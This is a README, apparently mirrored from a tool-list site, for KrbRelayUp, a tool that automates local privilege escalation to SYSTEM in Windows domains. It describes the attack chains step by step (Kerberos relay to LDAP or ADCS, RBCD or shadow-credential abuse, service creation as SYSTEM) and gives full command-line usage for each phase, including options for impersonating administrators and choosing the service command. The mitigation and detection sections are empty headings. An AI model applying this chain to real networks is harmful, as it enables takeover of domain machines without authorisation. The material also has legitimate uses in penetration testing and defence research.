Home

Awesome

KrbRelayUp

Simple wrapper around some of the features of Rubeus and KrbRelay (and a few other honorable mentions in the acknowledgements section) in order to streamline the abuse of the following attack primitive:

  1. (Optional) New machine account creation (New-MachineAccount)
  2. Local machine account auth coercion (KrbRelay)
  3. Kerberos relay to LDAP (KrbRelay)
  4. Add RBCD privs and obtain privileged ST to local machine (Rubeus)
  5. Using said ST to authenticate to local Service Manager and create a new service as NT/SYSTEM. (SCMUACBypass)

This is essentially a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).

UPDATE: Here is an excellent writeup by @an0n_r0 on how to perform this attack manually (using the original tools for this attack path: PowerMad/SharpMad, KrbRelay, Rubeus and SCMUACBypass)

Update - Shadow Credentials Support

I added some features to support this attack primitive using shadow credentials. Note this eliminates the need for adding (or owning) another machine account.

Note: this attack method bypasses the Protected Users (or 'Account is sensitive and cannot be delegated') mitigation due to the S4U2Self abuse.

  1. Local machine account auth coercion (KrbRelay)
  2. Kerberos relay to LDAP (KrbRelay)
  3. Generate new KeyCredential and add it to the local machine account's 'msDS-KeyCredentialLink' attribute. (Whisker and KrbRelay)
  4. Using said KeyCredential to obtain a TGT for the local machine account via PKInit. (Rubeus)
  5. Using the TGT to obtain privileged ST to local machine via S4U2Self and TGSSUB. (Rubeus)
  6. Using said ST to authenticate to local Service Manager and create a new service as NT/SYSTEM. (SCMUACBypass)

UPDATE: Here is an excellent writeup by @icyguider on how to perform the ShadowCred method of this attack manually (using the original tools for this attack path: KrbRelay, Rubeus and SCMUACBypass) along with the usage of NimCrypt2 to pack the various tools and evade some detection by defensive mechanism.

Update - ADCS Web Enrollment Support

I added support for relaying Machine KRB auth to ADCS Web Enrollment (instead of LDAP). This eliminates the requirement of LDAP Signing not to be enforced in the domain since this attack does not relay to LDAP.

Note: this attack method bypasses the Protected Users (or 'Account is sensitive and cannot be delegated') mitigation due to the S4U2Self abuse.

  1. Local machine account auth coercion (KrbRelay)
  2. Kerberos relay to ADCS (HTTP) (KrbRelay and ADCSPwn)
  3. Generate certificate request on behalf of the local machine account, submit it to ADCS Web Enrollment and finally retreive the certificate for the local machine account (ADCSPwn)
  4. Using said certificate to obtain a TGT for the local machine account via PKInit. (Rubeus)
  5. Using the TGT to obtain privileged ST to local machine via S4U2Self and TGSSUB. (Rubeus)
  6. Using said ST to authenticate to local Service Manager and create a new service as NT/SYSTEM. (SCMUACBypass)

Usage

KrbRelayUp - Relaying you to SYSTEM

FULL: Perform full attack chain. Options are identical to RELAY. Tool must be on disk.

RELAY: First phase of the attack. Will Coerce Kerberos auth from local machine account, relay it to LDAP and create a control primitive over the local machine using RBCD or SHADOWCRED.
Usage: KrbRelayUp.exe relay -d FQDN -cn COMPUTERNAME [-c] [-cp PASSWORD | -ch NTHASH]

    -m   (--Method)                   Abuse method to use in after a successful relay to LDAP <rbcd/shadowcred> (default=rbcd)
    -p   (--Port)                     Port for Com Server (default=12345)
    -cls (--Clsid)                    CLSID to use for coercing Kerberos auth from local machine account (default=90f18417-f0f1-484e-9d3c-59dceee5dbd8)

    # RBCD Method:
    -c   (--CreateNewComputerAccount) Create new computer account for RBCD. Will use the current authenticated user.
    -cn  (--ComputerName)             Name of attacker owned computer account for RBCD. (default=KRBRELAYUP$)
    -cp  (--ComputerPassword)         Password of computer account for RBCD. (default=RANDOM [if -c is enabled])

    # SHADOWCRED Method:
    -f   (--ForceShadowCred)          Clear the msDS-KeyCredentialLink attribute of the attacked computer account before adding our new shadow credentials. (Optional)

    # ADCS Method:
    -ca  (--CAEndpoint)               CA endpoint FQDN (default = same as DC)
    -https                            Connect to CA endpoint over secure HTTPS instead of HTTP)
    -cet (--CertificateTemplate)      Certificate template to request for (default=Machine)


SPAWN: Second phase of the attack. Will use the appropriate control primitive to obtain a Kerberos Service Ticket and will use it to create a new service running as SYSTEM.
Usage: KrbRelayUp.exe spawn -d FQDN -cn COMPUTERNAME [-cp PASSWORD | -ch NTHASH] <-i USERTOIMPERSONATE>

    -m   (--Method)                   Abuse method used in RELAY phase <rbcd/shadowcred> (default=rbcd)
    -i   (--Impersonate)              User to impersonate. should be a local administrator in the target computer. (default=Administrator)
    -s   (--ServiceName)              Name of the service to be created. (default=KrbSCM)
    -sc  (--ServiceCommand)           Service command [binPath]. (default = spawn cmd.exe as SYSTEM)

    # RBCD Method:
    -cn  (--ComputerName)             Name of attacker owned computer account for RBCD. (default=KRBRELAYUP$)
    -cp  (--ComputerPassword)         Password of computer account for RBCD. (either -cp or -ch must be specified)
    -ch  (--ComputerPasswordHash)     Password NT hash of computer account for RBCD. (either -cp or -ch must be specified)

    # SHADOWCRED | ADCS Method:
    -ce  (--Certificate)              Base64 encoded certificate or path to certificate file
    -cep (--CertificatePassword)      Certificate password (if applicable)


KRBSCM: Will use the currently loaded Kerberos Service Ticket to create a new service running as SYSTEM.
Usage: KrbRelayUp.exe krbscm <-s SERVICENAME> <-sc SERVICECOMMANDLINE>

    -s  (--ServiceName)              Name of the service to be created. (default=KrbSCM)
    -sc (--ServiceCommand)           Service command [binPath]. (default = spawn cmd.exe as SYSTEM)


General Options:
    -d  (--Domain)                   FQDN of domain. (Optional)
    -dc (--DomainController)         FQDN of domain controller. (Optional)
    -ssl                             Use LDAP over SSL. (Optional)
    -n                               Use CreateNetOnly (needs to be on disk) instead of PTT when importing ST (enabled if using FULL mode)
    -v  (--Verbose)                  Show verbose output. (Optional)

Examples

example example example

TODO

Mitigation & Detection

Acknowledgements